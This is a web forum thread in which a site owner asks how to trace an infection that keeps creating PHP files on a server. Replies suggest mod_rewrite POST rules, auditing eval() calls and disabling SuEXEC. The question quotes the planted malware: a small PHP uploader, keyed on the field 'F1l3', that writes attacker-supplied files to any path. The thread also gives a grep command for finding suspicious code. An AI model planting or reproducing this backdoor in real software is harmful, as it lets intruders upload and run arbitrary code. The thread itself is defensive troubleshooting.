Categories

JavaScriptPHPHTMLCssPythonWordPressWeb developmentLinuxMySQLAndroidWindowsJavaC++ / C#LayoutReactUbuntuYiiDjangoProgramming1C-BitrixLaravelSystem administrationTelegramJSONDebianPostgreSQLIOSGoogleHtaccessWindows ServerGitMacOSGoogle ChromeCMSWooСommerceBootstrapNginxSQLUnityAPI
Make a leaderReport
A
A
Alexander2014-10-30 10:15:55
PHP
Alexander, 2014-10-30 10:15:55

How to find a vulnerability on the server/websites?

In general, some kind of infection climbed onto the server.
Creates periodically(?) various files like class.php / main.php / and other interesting names. Previously, redirects were also registered in .htaccess, but I corrected this by changing the rights (such is the patch). It also creates a file with the following content:

<?
if ($_FILES['F1l3']) {move_uploaded_file($_FILES['F1l3']['tmp_name'], $_POST['Name']); Exit;}
  if ($_FILES['F1l3']) {
    move_uploaded_file($_FILES['F1l3']['tmp_name'], $_POST['Name']);
    echo 'OK';
  } else {
    echo 'You are forbidden!';
  }
?>

I searched both with an aibolit and with the help:
find ./ -name '*.php' | xargs grep -E '[0-9a-zA-Z/]{80}' > viruses.txt
found something, deleted something, but didn't help yet.
what else to do? this infection does not climb into a specific cms, although I used to think that it was. At the moment creates these files stupidly in the root of the site. Before that, they appeared in the most distant places, after yesterday's cleaning, so far only in the root.

Reply
Answer the question

Answer the question

In order to leave comments, you need to log in

3 answer(s)
Report
U
ugodrus, 2014-10-30
@ugodrus

There was such a problem. Through a hole in the old CMS, scripts were placed for mailing with Soap. Knowing that there are only two entry points in CMS, I wrote a rule via mod_rewrite
If the request method is POST and the file being accessed is not one of these two, then show it a cookie.
It's on the periphery. And also, I put bans on access to all administrative folders, the content of which is included. And in the end I found all the scripts that use eval (). And I checked all of them for code injection. Helped. Although the bots are still knocking.

Report
S
ShamblerR, 2015-02-18
@ShamblerR

what CMS?
CMS version?
what modules are installed?
Disable SuEXEC while you figure it out

Report
M
Maximbl4, 2015-09-11
@Maximbl4

A similar problem arose, aibolit does not detect this threat, a simple content search helped to get rid of it, but I would like to protect the site from this infection in a more radical way.
Is it possible to disable these requests somehow in .htaccess?

Similar questions
O
Orbb2017-06-20 18:34:45
Operation of the news complex component from the root, is it possible? 2Reply
A
Alexander Stepanov2017-06-20 20:01:16
How to organize a web interface for working with a database? 4Reply
A
Alexey Nikolaev2017-07-04 20:52:42
How to remove push effect from input button in IE? 4Reply
K
krlljs2017-07-06 04:28:55
Are there advertising platforms aggregator services for the summer of 2017? 2Reply
N
Nikolai Steshenko2021-05-24 00:59:15
How to add a field to registration or remove instantaCms? 2Reply

Didn't find what you were looking for?

Ask your question

Ask a Question

731 491 924 answers to any question